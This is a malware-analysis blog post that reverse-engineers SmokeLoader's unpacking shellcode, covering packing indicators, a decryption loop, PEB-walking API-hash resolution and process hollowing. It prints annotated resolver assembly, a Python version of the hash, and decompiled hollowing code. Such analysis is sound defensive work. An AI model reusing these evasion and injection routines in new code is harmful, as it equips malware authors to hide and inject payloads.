SmokeLoader ShellCode Analysis
Introduction
Hello Geeks, today I am going to dive deep into the shellcode that SmokeLoader uses during its unpacking process. The shellcode is not too hard to understand, but it does have some challenges. I used some blogs as references for a few of the structures, so let's do it...
Overview
SmokeLoader is one of the most widely used loaders these days, thanks to how effective it is at techniques like:
- anti sandboxing
- anti-debugging
- AV Evasion
- Process Injection
- Anti Hooking
I will not analyze the whole sample in this blog. I will only analyze the code used in the unpacking process, because I think almost all malware nowadays is packed and we need to understand how unpacking is done at the assembly level.
FirstLook -_-
I have used an old sample because you can find it easily with the SHA-1 hash "72FC3CE96BD9406215CEC015D70BBB67318F1E23".
The sample is flagged by 60 AV engines on VirusTotal, and it imports some functions that are rarely used in malicious operations, which is an indicator of packing. I will also test it with PEiD and look at the entropy of the sections.
big difference in raw and virtual size — figure 01
And here is how the entropy looks in PEiD, which is another strong indicator of packing.
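If you don't have PEiD at hand, the entropy check is easy to reproduce. Here is a minimal sketch in Python that computes the Shannon entropy of a byte buffer; the function name is my own, and reading the section bytes out of the PE file is left out. Values close to 8 bits per byte usually mean compressed or encrypted data.

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Return the Shannon entropy of data in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())

print(shannon_entropy(b"\x00" * 1024))         # constant data, lowest entropy
print(shannon_entropy(bytes(range(256)) * 4))  # uniform bytes, highest entropy
```

Run it over the raw bytes of each section and compare the numbers with what the tool reports.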
CODE Analysis
I will use IDA to disassemble the code. After moving around the code view and between functions, I discovered that the sample uses a lot of junk code just to make analysis harder. When dealing with packed samples there are some APIs we need to pay attention to:
- VirtualAlloc
- GlobalAlloc
- LocalAlloc
- VirtualAllocEx
In sub_4019B0() there are two calls to the LocalAlloc() API. One of them does nothing, and the other is called with the argument dwSize.
first call for local alloc figure 02
The function Missed_() at 0x0401E9F makes some changes to the dwSize global variable.
We need to trace the allocated space to see what data gets written there. In the next figure, data is copied through pointers:
Write data into the allocated Address — figure 03
This block of code writes the content from (dword_45CF0C + k + 0x8F176), where 'k' is used as a counter. So we need to know the value in dword_45CF0C to know where the data is copied from.
Before the loop there is another assignment that deserves our attention:
dword_45CF0C = dword_448A84
When I checked dword_448A84, it had the initial value 0x39AAA2.
If we solve the expression above with k = 0, the result looks like this:
0x39AAA2 + 0x8F176 = 0x00429C18 → ShellCode Address
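The same arithmetic can be checked quickly in Python. This is only a sketch of the address calculation, with constant and function names of my own, assuming the addition wraps at 32 bits like the original code.

```python
BASE = 0x39AAA2   # initial value of dword_448A84
DELTA = 0x8F176   # constant added inside the copy loop

def source_address(k: int) -> int:
    """Address read on iteration k of the copy loop (32-bit wraparound)."""
    return (BASE + k + DELTA) & 0xFFFFFFFF

print(hex(source_address(0)))  # 0x429c18
```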
figure 04
So if we jump to the resolved address 0x0429C18, this is what we find:
figure 05
In sub_403206(int &lpaddress , SIZE_T &dwsize) there is another call to the LocalAlloc API:
figure 06
If we look at the end of this function, lpaddress is changed to point to the shellcode address. What I took from this function is that it writes the code section of the shellcode, because what we saw in figure 05 is not the real shellcode; it is just the data the shellcode will use for payload injection.
Change Protection and Transfer Execution
figure 07
Here the packer changes the protection of the allocated memory where the shellcode was written, using 0x40 as the protection value:
0x40 → PAGE_EXECUTE_READWRITE
After that there is a call to lpAddress, the start of the shellcode. I will use the debugger for the next steps to extract the shellcode and reverse it.
Apply decryption for ShellCode
I know this may be confusing, but it may help you in your next unpacking session and change how you think about unpacking and how to deal with it.
We see a call to 0x404B83 at address 0x401BAD. I have renamed the function to mw_w_apply_decryption to express its behavior. The function takes 3 arguments:
push offset unk_448000
push dwSize
push lpAddress
call mw_w_apply_decryption
unk_448000 contains some data we need to observe.
Inside mw_w_apply_decryption there is a call to 0x404934, which I have renamed apply_decryption:
for ( i = 0; i < dwsize / 8; ++i )
{
if ( dwSize == 4445 )
VerifyVersionInfoW(&VersionInformation, 0, 0i64);
result = apply_decryption(lpaddress + 8 * i, unk__);
}
So we need to dive into this function and find the decryption part. I see some XOR operations and some bit-shifting operations. I am not really interested in the decryption mechanism itself; I just want to know what this function does to the shellcode.
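To make the shape of that loop clearer, here is a small Python sketch of walking a buffer in 8-byte blocks. The block size and the integer division come from the decompiled loop; the transform is a hypothetical XOR placeholder of my own, not the real apply_decryption, which I did not reverse.

```python
from typing import Callable

BLOCK_SIZE = 8  # the loop advances lpaddress by 8 bytes per iteration

def apply_blockwise(buf: bytearray, key: bytes,
                    transform: Callable[[bytes, bytes], bytes]) -> None:
    """Run transform over every full 8-byte block of buf, in place.

    Mirrors `for (i = 0; i < dwSize / 8; ++i)`: a trailing partial block
    is left untouched because of the integer division.
    """
    for i in range(len(buf) // BLOCK_SIZE):
        start = i * BLOCK_SIZE
        block = bytes(buf[start:start + BLOCK_SIZE])
        buf[start:start + BLOCK_SIZE] = transform(block, key)

def placeholder_xor(block: bytes, key: bytes) -> bytes:
    """Hypothetical stand-in; NOT the sample's real apply_decryption."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(block))

data = bytearray(b"ABCDEFGHIJKLMNOPxyz")  # 2 full blocks + 3 trailing bytes
apply_blockwise(data, b"\x01\x02", placeholder_xor)
print(data[-3:])  # the trailing bytes are not processed
```

The useful takeaway for unpacking is that the buffer is modified in place, so dumping it right after this call returns gives you the decrypted shellcode.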
figure 08
Advanced Dynamic Analysis
Here is the first call to the LocalAlloc() API:
figure 09
We'll keep our eyes on the allocated space:
figure 10
Here we have the shellcode written into the allocated space, and as I said before, at the end of this function lpaddress is changed:
mov dword ptr ds:[eax],edi
eax --> lpaddress
edi --> the address of the shellcode
figure 11
And here is the decryption part I explained above, followed by the execution transfer:
figure 12
And here is the start of the shellcode:
figure 13
I will dump this shellcode and try to analyze it with some tricks and some structures, using IDA for the rest of the analysis.
After cleaning the dumped memory and mapping the addresses, here is the start of the shellcode.
the start of Shellcode- figure 14
Inside sub_630, the shellcode uses stack strings to evade detection by security solutions. Before resolving these strings there is a call to sub_010 at address 0x647, which I have renamed sh_w_GetAPIAddr. Let's explore it to see why I chose this name.
sh_w_GetAPI_Addr — figure 15
Inside sub_0110 there is another call, to sub_042, which I have renamed sh_GetAPIAddr. It takes 2 arguments:
call for API hashing resolve figure-16
ptr_loadlibrary = sh_GetAPIAddr(0xD4E88, 0xD5786);// kernel32.dll hash, LoadLibraryA hash
ptr_GetProcAddr = sh_GetAPIAddr(0xD4E88, 0x348BFA);// kernel32.dll hash, GetProcAddress hash
The idea is that a hash of the DLL name and a hash of the API name are passed in, and inside the function there is some work with the PEB structures and the loaded modules. The trick is that a lot of malware resolves APIs at run time to evade detection and make analysis harder. I will dive into this call to see how the operation is done, and after that I will show you something that makes getting past this trick easy. Let's dive deep into sub_042 and see how these hashes are resolved to API addresses.
I will write the code used for the method here instead of using figures to make it easier to trace, and I have commented every assembly line for those who know how to deal with assembly -_-
seg000:00000042 sh_GetAPIAddr proc near
seg000:00000042
seg000:00000042 hash_Kerenl32 = dword ptr 8
seg000:00000042 hash_loadlibrary= dword ptr 0Ch
seg000:00000042
seg000:00000042 push ebp
seg000:00000043 mov ebp, esp
seg000:00000045 push ebx
seg000:00000046 push esi
seg000:00000047 push edi
seg000:00000048 push ecx
seg000:00000049 push dword ptr fs:loc_30 ; push fs:[30h] --> PEB
seg000:00000050 pop eax ; eax --> PEB
seg000:00000051 mov eax, [eax+0Ch] ; eax = [PEB+0Ch] --> LoaderData
seg000:00000054 mov ecx, [eax+0Ch] ; ecx = [LoaderData+0Ch] --> InLoadOrderModuleList (first module entry)
seg000:00000057
seg000:00000057 loc_57:
seg000:00000057 mov edx, [ecx] ; edx = Flink --> next module entry in the list
seg000:00000059 mov eax, [ecx+30h] ; eax --> BaseDllName
seg000:0000005C push 2 ; a3
seg000:0000005E mov edi, [ebp+hash_Kerenl32]
seg000:00000061 push edi ; edi --> Kerenl32_Hash
seg000:00000062 push eax ; loadedDllName
seg000:00000063 call hash_and_compare
seg000:00000068 test eax, eax
seg000:0000006A jz short loc_70 ; jump if eax = 0 --> comparison succeeded
seg000:0000006C mov ecx, edx ; no match: ecx = next module entry
seg000:0000006E jmp short loc_57 ; check the next loaded module
seg000:00000070 ; ---------------------------------------------------------------------------
seg000:00000070
seg000:00000070 loc_70:
seg000:00000070 mov eax, [ecx+18h] ; ecx --> InLoadOrderModuleList
seg000:00000070 ; eax = [ecx+0x18] --> DllBaseAddress
seg000:00000073 push eax ; push BaseAddress of Dll
seg000:00000074 mov ebx, [eax+3Ch] ; ebx = e_lfanew (offset of the NT headers)
seg000:00000077 add eax, ebx ; eax = DllBaseAddress + e_lfanew --> NT headers
seg000:00000079 mov ebx, [eax+78h] ; ebx = Data Directories[Export_Table] (RVA)
seg000:0000007C pop eax ; pop eax --> eax = DllBaseAddress
seg000:0000007D push eax ; push DllBaseAddress
seg000:0000007E add ebx, eax ; ebx = Export_Table + DllBaseAddress
seg000:00000080 mov ecx, [ebx+1Ch] ; ecx = [ebx+1Ch] --> AddressOfFunctions
seg000:00000083 mov edx, [ebx+20h] ; edx = [ebx+20h] --> AddressOfNames
seg000:00000086 mov ebx, [ebx+24h] ; ebx = [ebx+24h] --> AddressOfNameOrdinals
seg000:00000089 add ecx, eax ; ecx = AddressOfFunction + DllBaseAddress
seg000:0000008B add edx, eax ; edx = AddressOfNames + DllBaseAddress
seg000:0000008D add ebx, eax ; ebx = AddressOfNameOrdinals + DllBaseAddress
seg000:0000008F
seg000:0000008F loc_8F:
seg000:0000008F mov esi, [edx]
seg000:00000091 pop eax
seg000:00000092 push eax ; eax --> DllBaseAddress
seg000:00000093 add esi, eax ; esi = name RVA + DllBaseAddress --> ApiName
seg000:00000095 push 1 ; a3
seg000:00000097 push [ebp+hash_loadlibrary] ; pre-calculated API hash
seg000:0000009A push esi ; API name
seg000:0000009B call hash_and_compare
seg000:000000A0 test eax, eax
seg000:000000A2 jz short loc_AC ;
seg000:000000A2 ; eax --> DllBaseAddress
seg000:000000A4 add edx, 4
seg000:000000A7 add ebx, 2
seg000:000000AA jmp short loc_8F
seg000:000000AC ; ---------------------------------------------------------------------------
seg000:000000AC
seg000:000000AC loc_AC:
seg000:000000AC pop eax ;
seg000:000000AC ; eax --> DllBaseAddress
seg000:000000AD xor edx, edx ; edx = 0
seg000:000000AF mov dx, [ebx] ; dx = [ebx] --> Ordinal of resolved API
seg000:000000B2 shl edx, 2 ; edx * 4
seg000:000000B5 add ecx, edx ; ecx = AddressOfFunction + (edx*4)
seg000:000000B7 add eax, [ecx] ; eax = DllBaseAddress + [ecx] (function RVA)
seg000:000000B7 ; eax --> API_Address
seg000:000000B9 pop ecx
seg000:000000BA pop edi
seg000:000000BB pop esi
seg000:000000BC pop ebx
seg000:000000BD mov esp, ebp
seg000:000000BF pop ebp
seg000:000000C0 retn 8
seg000:000000C0 sh_GetAPIAddr endp
seg000:000000C0
Keep your eyes on this code for a few seconds. I tried to make the comments easy to understand, and I will also explain it line by line.
At address 0x49 the sample gets the PEB (Process Environment Block) structure, whose address is stored at fs:[0x30]. It contains data about the current process, such as the loaded modules, and this data is also used by the Windows loader.
seg000:00000049 push dword ptr fs:loc_30 ; push PEB
seg000:00000051 mov eax, [eax+0Ch] ; eax --> LoaderData
Here it gets the address of LoaderData by reading the pointer at offset 0xC from eax, which contains the PEB address.
Here is what the loader data structure looks like:
struct _PEB_LDR_DATA { //loader data Structure
DWORD Length_; //+00
DWORD Initialized; //+04
DWORD SsHandle; //+08
__LIST_ENTRY InLoadOrderModuleList; //+0C
__LIST_ENTRY InMemoryOrderModuleList; //+14
__LIST_ENTRY InInitializationOrderModuleList; //+1C
DWORD EntryInProgress; //+24
DWORD ShutdownInProgress; //+28
DWORD ShutdownThreadId; //+2C
};
seg000:00000054 mov ecx, [eax+0Ch] ; ecx –> InloadOrderModuleList
Reading offset 0xC from eax, which holds the LoaderData address, gives us InLoadOrderModuleList, which is a linked list of loaded modules where every node is a structure.
Here is what this structure looks like:
struct _LDR_DATA_TABLE_ENTRY{
__LIST_ENTRY InLoadOrderLinks; //+00
__LIST_ENTRY InMemoryOrderLinks; //+08
__LIST_ENTRY InInitializationOrderLinks; //+10
DWORD DllBase; //+18
DWORD EntryPoint; //+1C
DWORD SizeOfImage; //+20
DWORD FullDllNameLength; //+24
char* FullDllName; // _UNICODE_STRING //+28
DWORD BaseDllNameLength; //+2C
char* BaseDllName; //_UNICODE_STRING //+30
DWORD Flags; //+34
short LoadCount; //+38
short TlsIndex; //+3A
union{
__LIST_ENTRY HashLinks;
DWORD SectionPointer;
};
DWORD CheckSum;
union{
DWORD TimeDateStamp;
DWORD LoadedImports;
};
DWORD EntryPointActivationContext;
DWORD PatchInformation;
__LIST_ENTRY ForwarderLinks;
__LIST_ENTRY ServiceTagLinks;
__LIST_ENTRY StaticLinks;
};
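If you want to double-check the offsets the shellcode relies on (+18h for DllBase and +30h for the BaseDllName buffer), a quick way is to model the 32-bit layout with ctypes. This is only a sketch of the first part of the entry; the class names are mine, and the UNICODE_STRING members are modeled as Length, MaximumLength and Buffer.

```python
import ctypes

class ListEntry32(ctypes.Structure):
    _fields_ = [("Flink", ctypes.c_uint32), ("Blink", ctypes.c_uint32)]

class UnicodeString32(ctypes.Structure):
    _fields_ = [("Length", ctypes.c_uint16),
                ("MaximumLength", ctypes.c_uint16),
                ("Buffer", ctypes.c_uint32)]

class LdrDataTableEntry32(ctypes.Structure):
    _fields_ = [("InLoadOrderLinks", ListEntry32),
                ("InMemoryOrderLinks", ListEntry32),
                ("InInitializationOrderLinks", ListEntry32),
                ("DllBase", ctypes.c_uint32),
                ("EntryPoint", ctypes.c_uint32),
                ("SizeOfImage", ctypes.c_uint32),
                ("FullDllName", UnicodeString32),
                ("BaseDllName", UnicodeString32),
                ("Flags", ctypes.c_uint32),
                ("LoadCount", ctypes.c_uint16),
                ("TlsIndex", ctypes.c_uint16)]

# Offset of the name buffer pointer = start of BaseDllName + offset of Buffer
name_buffer_offset = (LdrDataTableEntry32.BaseDllName.offset
                      + UnicodeString32.Buffer.offset)

print(hex(LdrDataTableEntry32.DllBase.offset))  # 0x18
print(hex(name_buffer_offset))                  # 0x30
```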
The next assembly line reads the link to the next module in the list:
seg000:00000057 mov edx, [ecx] ; edx --> Flink, the next module entry
After that it gets the name of the loaded DLL by reading offset 0x30 from the module entry address:
seg000:00000059 mov eax, [ecx+30h] ; eax --> BaseDllName
After getting the DLL name and saving a pointer to it in the eax register (eax → points to the DLL name), the shellcode calls sub_0C3, which I have renamed hash_and_compare.
hash_and_compare call - figure 17
This function takes 3 arguments (listed in push order):
1- the value 2, which appears to be the character size in bytes (the DLL name is a Unicode string)
2- the pre-calculated hash to compare with (see figure 16)
3- the DLL name resolved before
So I will try to analyze this function and see how the hash algorithm works.
Inside sub_C3, this line moves the passed DLL name pointer into eax:
seg000:000000CF mov eax, [ebp+arg_Dll_Name] ; eax –> DLL Name
Then it creates a loop to iterate over the full DLL name:
hashing loop — figure 18
The algorithm here is very simple and we can summarize it in a few steps:
1- get the lowercase of the char, A → a
2- add this char to the previous hash
3- shift the result of step 2 left by 1, i.e. multiply it by 2 (shl ebx,1)
4- check whether we reached the end of the name by checking for the null terminator
After calculating the hash of the DLL name, it is compared against the pre-calculated hash. If the comparison fails the function returns 1, and if the comparison succeeds it returns 0.
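The steps above can be sketched in a few lines of Python. One thing here is an assumption on my side and not something I showed in the figures: the lowercase step is modeled as OR-ing each byte with 0x60. With that assumption the sketch reproduces the three constants passed to sh_GetAPIAddr earlier (0xD4E88, 0xD5786 and 0x348BFA). The function names are mine.

```python
def sl_hash(name: str) -> int:
    """Add-then-shift hash from the steps above, kept to 32 bits."""
    h = 0
    for byte in name.encode("ascii"):
        h = (h + (byte | 0x60)) & 0xFFFFFFFF  # assumption: lowercase via OR 0x60
        h = (h << 1) & 0xFFFFFFFF             # shl ebx, 1
    return h

def hash_and_compare(name: str, expected: int) -> int:
    """Return 0 on match and 1 on mismatch, like the shellcode routine."""
    return 0 if sl_hash(name) == expected else 1

for candidate in ("kernel32.dll", "LoadLibraryA", "GetProcAddress"):
    print(f"{candidate}: {sl_hash(candidate):#x}")
```

Because of the OR, upper and lower case names give the same hash, so it does not matter how the loader stored the module name.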
figure 19
If the comparison succeeds, it then tries to resolve the API address with a similar method, using the export table of the resolved DLL. Here is the code for this part:
seg000:00000070 loc_70: ; ecx --> InLoadOrderModuleList
seg000:00000070 mov eax, [ecx+18h] ; ecx --> InLoadOrderModuleList
seg000:00000070 ; eax = [ecx+0x18] --> DllBaseAddress
seg000:00000073 push eax ; push BaseAddress of Dll
seg000:00000074 mov ebx, [eax+3Ch] ; ebx = e_lfanew (offset of the NT headers)
seg000:00000077 add eax, ebx ; eax = DllBaseAddress + e_lfanew --> NT headers
seg000:00000079 mov ebx, [eax+78h] ; ebx = Data Directories[Export_Table] (RVA)
seg000:0000007C pop eax ; pop eax --> eax = DllBaseAddress
seg000:0000007D push eax ; push DllBaseAddress
seg000:0000007E add ebx, eax ; ebx = Export_Table + DllBaseAddress
seg000:00000080 mov ecx, [ebx+1Ch] ; ecx = [ebx+1Ch] --> AddressOfFunctions
seg000:00000083 mov edx, [ebx+20h] ; edx = [ebx+20h] --> AddressOfNames
seg000:00000086 mov ebx, [ebx+24h] ; ebx = [ebx+24h] --> AddressOfNameOrdinals
seg000:00000089 add ecx, eax ; ecx = AddressOfFunction + DllBaseAddress
seg000:0000008B add edx, eax ; edx = AddressOfNames + DllBaseAddress
seg000:0000008D add ebx, eax ; ebx = AddressOfNameOrdinals + DllBaseAddress
seg000:0000008F
Do you remember when I talked about the module linked list?
At 0x0070, [ecx+18h] points to the DllBase structure member, and this base address is the address of the DLL in memory.
After that, at 0x0074, it reads the DWORD at base address + 0x3C, which is e_lfanew, the offset of the NT headers (the PE signature), not of the optional header.
At 0x0079 it reads the DWORD at offset 0x78 from eax, which now points to the NT headers. That field is the RVA of the export directory, the first entry of the data directories.
So after adding the base address, ebx points to Export_Table, which is a structure of API information like:
-name
-address
-ordinal number
From 0x0080 to 0x0086 it resolves the addresses where this data lives:
ecx --> AddressOfFunctions
edx --> AddressOfNames
ebx --> AddressOfNameOrdinals
Here is the structure:
typedef struct _IMAGE_EXPORT_DIRECTORY {
DWORD Characteristics; // 0x0
DWORD TimeDateStamp; // 0x4
WORD MajorVersion; // 0x8
WORD MinorVersion; // 0xA
DWORD Name; // 0xC
DWORD Base; // 0x10
DWORD NumberOfFunctions; // 0x14
DWORD NumberOfNames; // 0x18
DWORD AddressOfFunctions; // 0x1C
DWORD AddressOfNames; // 0x20
DWORD AddressOfNameOrdinals; // 0x24
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;
If you got confused by the code and structures above, the PE graph from the Corkami project may help you.
retrieve API Name
After playing with the structures, the shellcode gets each API name and hashes it with the same operation used before for the DLL name.
hash API name — figure 20
Here it pushes 3 arguments:
- API name
- a3 → 1 here, which appears to be the character size in bytes (export names are ASCII strings, while the DLL name was a Unicode string)
- pre-calculated hash of the API to compare with
If the comparison succeeds, the shellcode resolves the address of the API using the same Export Table structure:
figure 20
At the end of this function the resolved API address is saved in the eax register.
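Here is a rough Python model of that lookup, to show how the three export arrays work together. The arrays and the base address below are made up for the example and do not come from a real DLL, and the hash uses the same OR 0x60 lowercase assumption as before. The shellcode itself has no "not found" case; I only added one so the sketch cannot loop forever.

```python
def sl_hash(name: str) -> int:
    """Same add-then-shift hash; lowercase via OR 0x60 is an assumption."""
    h = 0
    for byte in name.encode("ascii"):
        h = ((h + (byte | 0x60)) << 1) & 0xFFFFFFFF
    return h

def resolve_export(base, names, name_ordinals, functions, wanted_hash):
    """Walk names and ordinals in lockstep, then index the function table."""
    for index, name in enumerate(names):      # add edx, 4 / add ebx, 2
        if sl_hash(name) == wanted_hash:
            ordinal = name_ordinals[index]    # mov dx, [ebx]
            return base + functions[ordinal]  # add eax, [ecx + ordinal*4]
    return None  # not in the shellcode; added for safety

# Made-up export data for a hypothetical DLL mapped at 0x10000000
BASE = 0x10000000
NAMES = ["CloseHandle", "GetProcAddress", "LoadLibraryA"]
NAME_ORDINALS = [2, 0, 1]
FUNCTIONS = [0x1500, 0x2A00, 0x1100]  # RVAs indexed by ordinal

print(hex(resolve_export(BASE, NAMES, NAME_ORDINALS, FUNCTIONS, 0xD5786)))
```

The point to notice is that the position of the name is not the position of the function: the name index selects an entry in AddressOfNameOrdinals, and that ordinal selects the RVA in AddressOfFunctions.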
I know you may have missed some things because of my explanation; I am not that guy who is great at teaching hard things.
So I will show you how to deal with API hashing and let IDA do the job for you.
First, you need to install the HashDB plugin from OALabs.
After installing the plugin, go to the hash that is passed as an argument and right-click on it.
You will find an option like HashDB Hunt Algorithm:
figure 21
After clicking on it you need to wait about 15 seconds, and the output will look like this:
hashdb output — figure 22
The algorithm you choose may give you a different result, so if you are comfortable with the call arguments you will know how to deal with this.
After that you will find a local type created in your Local Types tab with the name of the algorithm you chose:
local types — figure 23
Then go back to your code, put the cursor on the function, and change its argument type by pressing the hotkey 'y'. You will see this on your screen:
function argument type -figure 23
You need to change the argument type from:
int → *algorithm name
In my case it looks like this:
figure 24
After that IDA will replace the hashes with their equivalent API names, like this:
Dynamic Api Resolving — figure 25
Building IAT (import address table)
After that, sub_630 resolves the API addresses it needs and builds its own API table. After some reversing I created a structure for the resolved API names, to know which API is called inside the other functions.
building IAT — figure 26
Here is what this structure looks like:
struct API_IAT
{
int ptr_LoadLibrary;
int ptr_GetProcAddr;
char var_D8;
int buffer;
int user32_hModule;
int MessageBoxA_api;
int GetMessageExtraInfo_api;
int kernel32_hModule;
int WinExec_api;
int CreateFileA_api;
int WriteFile_api;
int CloseHandle_api;
int CreateProcessA_api;
int GetThreadContext_api;
int VirtualAlloc_api;
int VirtualAllocExw_api;
int VirtualFree_api;
int ReadProcessMemory_api;
int WriteProcessMemory_api;
int SetThreadContext_api;
int ResumeThread_api;
int WaitForSingleObject_api;
int GetModuleFileNameA_api;
int GetCommandLineA_api;
int RegisterClassExA_api;
int CreateWindowExA_api;
int PostMessageA_api;
int GetMessageA_api;
int DefWindowProcA_api;
int GetFileAttributesA_api;
int ntdlldll_hModule;
int NtUnmapViewOfSection_api;
int NtWriteVirtualMemory_api;
int GetStartupInfoA_api;
int VirtualProtectEx_api;
int ExitProcess_api;
};
At the end of sub_630 you will find the member [API_IAT.buffer] being assigned the value 0x15A0, and there is a call to sub_5B0 with our structure as the argument:
figure 27
When I jumped to address 0x15A0 I found the payload that will be dropped by this shellcode, which is a PE file:
Pe File - figure 28
Inside sub_110 an injection operation is performed, specifically process hollowing. I will not explain how process hollowing works because I did this before in another article that explains process hollowing line by line; you can check it here.
Here is the code used for this operation:
v19 = 2;
buffer = IAT_Struct->buffer; // buffer = 0x15A0
ptr_optionalHeader = *(buffer + 0x3C) + IAT_Struct->buffer;// e_lfanew --> NT headers (despite the variable name)
ptr_memory = (IAT_Struct->VirtualAlloc_api)(0, 10240, 4096, 4);
result = (IAT_Struct->GetModuleFileNameA_api)(0, ptr_memory, 10240);
if ( *ptr_optionalHeader == 'EP' ) // 'PE'
{
v15 = 0;
v16 = 0;
hProcess = 0;
v14 = 0;
memset(v3, 0, sizeof(v3));
v5 = 0;
v9 = 0;
v7 = 0;
v8 = 0;
v6 = 0;
v4 = 0;
(IAT_Struct->GetStartupInfoA_api)(v3);
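commandLine_ = (IAT_Struct->GetCommandLineA_api)();
// the decompiler attached the remaining arguments to GetCommandLineA; they belong to CreateProcessA
result = (IAT_Struct->CreateProcessA_api)(ptr_memory, commandLine_, 0, 0, 0, 0x8000004, 0, 0, v3, &hProcess);// 0x8000004 = CREATE_NO_WINDOW | CREATE_SUSPENDED
if ( result ) // nonzero on success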
{
(IAT_Struct->VirtualFree_api)(ptr_memory, 0, 0x8000);
ptr_memory_1 = (IAT_Struct->VirtualAlloc_api)(0, 4, 4096, 4);
*ptr_memory_1 = 65543; // 0x10007 = CONTEXT_FULL (ContextFlags)
result = (IAT_Struct->GetThreadContext_api)(v14, ptr_memory_1);
if ( result )
{
(IAT_Struct->ReadProcessMemory_api)(hProcess, ptr_memory_1[41] + 8, &base_address, 4, 0);
if ( base_address == *(ptr_optionalHeader + 0x34) )
(IAT_Struct->NtUnmapViewOfSection_api)(hProcess, base_address);
v11 = (IAT_Struct->VirtualAllocExw_api)(
hProcess,
*(ptr_optionalHeader + 52),
*(ptr_optionalHeader + 80),
12288,
64);
(IAT_Struct->NtWriteVirtualMemory_api)(hProcess, v11, IAT_Struct->buffer, *(ptr_optionalHeader + 84), 0);
for ( i = 0; i < *(ptr_optionalHeader + 6); ++i )
{
v17 = (*(buffer + 60) + IAT_Struct->buffer + 40 * i + 248);
(IAT_Struct->NtWriteVirtualMemory_api)(hProcess, v17[3] + v11, v17[5] + IAT_Struct->buffer, v17[4], 0);
}
(IAT_Struct->WriteProcessMemory_api)(hProcess, ptr_memory_1[41] + 8, ptr_optionalHeader + 52, 4, 0);
ptr_memory_1[44] = *(ptr_optionalHeader + 40) + v11;
(IAT_Struct->SetThreadContext_api)(v14, ptr_memory_1);
(IAT_Struct->ResumeThread_api)(v14);
(IAT_Struct->CloseHandle_api)(v14);
(IAT_Struct->CloseHandle_api)(hProcess);
return (IAT_Struct->ExitProcess_api)(0);
}
}
}
return result;
}
To summarize, this shellcode does the following:
- builds its IAT using runtime API resolving
- starts a new instance of its own executable in a suspended state
- unmaps the original image from that process
- writes the new payload, which resides at 0x15A0, into the process
- resumes the process with the new payload
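The decompiled code reads the payload's PE header through raw offsets (6, 40, 52, 80, 84 and 248), so here is a small Python sketch that gives those offsets their PE32 field names. The helper name is mine and the header at the bottom is a synthetic one with made-up values, only there to exercise the parser. In the same code, ptr_memory_1[41] and ptr_memory_1[44] are offsets 0xA4 and 0xB0 of the x86 CONTEXT structure, which are Ebx and Eax.

```python
import struct

def hollowing_fields(image: bytes) -> dict:
    """Read the PE32 header fields that the decompiled code accesses by offset."""
    (nt,) = struct.unpack_from("<I", image, 0x3C)  # e_lfanew
    if image[nt:nt + 2] != b"PE":                  # *ptr_optionalHeader == 'EP'
        raise ValueError("not a PE image")

    def read32(offset: int) -> int:
        return struct.unpack_from("<I", image, nt + offset)[0]

    return {
        "NumberOfSections": struct.unpack_from("<H", image, nt + 6)[0],
        "AddressOfEntryPoint": read32(40),
        "ImageBase": read32(52),
        "SizeOfImage": read32(80),
        "SizeOfHeaders": read32(84),
        "SectionTableOffset": nt + 248,  # 40-byte section headers start here
    }

# Tiny synthetic header with made-up values
img = bytearray(0x400)
struct.pack_into("<I", img, 0x3C, 0x80)
img[0x80:0x84] = b"PE\0\0"
struct.pack_into("<H", img, 0x80 + 6, 3)
struct.pack_into("<I", img, 0x80 + 40, 0x1000)
struct.pack_into("<I", img, 0x80 + 52, 0x400000)
struct.pack_into("<I", img, 0x80 + 80, 0x5000)
struct.pack_into("<I", img, 0x80 + 84, 0x400)
print(hollowing_fields(bytes(img)))
```

Inside each 40-byte section header, v17[3], v17[4] and v17[5] are VirtualAddress, SizeOfRawData and PointerToRawData, which is why the loop copies every section to v11 + VirtualAddress.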
That is the end of the article. I hope you learned something new, and if there are any mistakes do not hesitate to tell me.
Thanks for your time -_- ...